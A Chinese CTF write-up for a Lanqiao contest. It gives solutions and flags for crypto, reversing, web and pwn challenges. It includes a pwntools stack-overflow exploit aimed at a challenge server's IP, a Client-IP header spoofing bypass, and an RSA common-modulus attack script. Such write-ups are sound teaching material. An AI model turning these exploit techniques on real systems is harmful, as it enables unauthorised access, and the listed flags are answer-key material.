蓝桥WP

CyberChef

可以看出是先将flag base64加密一下然后ROT13加密

先手动爆破出ROT13得ZmxhZ3tkY2I3N2FiYy02NDQ1LTQ4NDAtYmJjYS01MjUyZjYwNzM1ZTd9

然后base64解密得flagflag{dcb77abc-6445-4840-bbca-5252f60735e7}

XOR

IDA64 打开，一眼小端序和循环异或
key为SEcRET7,写个脚本

flagflag{a83ee6c1-2296-4d3e-9d3c-42604f76f7d5}

exp

key = 'SEcRET7'
len = len(key)
s2 = [0x35, 0x29, 0x02, 0x35, 0x3E, 0x35, 0x0F, 0x60,
      0x20, 0x06, 0x64, 0x26, 0x65, 0x1A, 0x61, 0x77,
      0x5A, 0x64, 0x68, 0x60, 0x53, 0x60, 0x20, 0x4E,
      0x6B, 0x21, 0x67, 0x54, 0x7E, 0x71, 0x51, 0x64,
      0x75, 0x60, 0x51, 0x64, 0x73, 0x05, 0x65, 0x21, 0x61, 0x4A]
flag = ''
for i in range(42):
    flag += chr(s2[i] ^ ord(key[i % len]))
print(flag)

RC4

ida32 打开

RC4 直接梭

flagflag{c8fd99f1-841a-44c9-8d38-746db6ff95c1}

栈溢出

IDA64 打开可以看到是一个明显的gets命令，正常的栈溢出漏洞

exp

from pwn import *
p = remote('47.94.96.185', 31152)
payload = b'a'*0x28+p64(0x4011B1)
p.sendline(payload)
p.interactive()

flagflag{21c601fb-fc07-44ee-afad-cf9a2ee36c50}

禁止访问

bp抓包
client-ip修改一下
flagflag{9d7d20d5-03e5-443e-b29f-b64fd6610fc6}

RSA

有个模板题RSA，写个脚本解决，c1,c2带进去就行了

from Crypto.Util.number import bytes_to_long
import gmpy2
import binascii
import random
random.seed(123456)
e1 = random.randint(100000000, 999999999)
n = 7265521127830448713067411832186939510560957540642195787738901620268897564963900603849624938868472135068795683478994264434459545615489055678687748127470957
c1 = 3315026215410356401822612597933850774333471554653501609476726308255829187036771889305156951657972976515685121382853979526632479380900600042319433533497363
c2 = 1188105647021006315444157379624581671965264301631019818847700108837497109352704297426176854648450245702004723738154094931880004264638539450721642553435120
e2 = 65537
s = gmpy2.gcdext(e1,e2)# 扩展欧几里得算法
m1 = gmpy2.powmod(c1,s[1],n) 
m2 = gmpy2.powmod(c2,s[2],n) 
m = (m1*m2)%n 
print(binascii.unhexlify(hex(m)[2:]))
#b'flag{359a1693-7bce-4fbc-87fa-111cdffaa0e8}'

ZIP

分析数据，发现flag.zip
收缩压缩包头部和尾部特征值504B
找到压缩包位置
将压缩包部分新建一个010的文件
然后根据提示爆破得到flag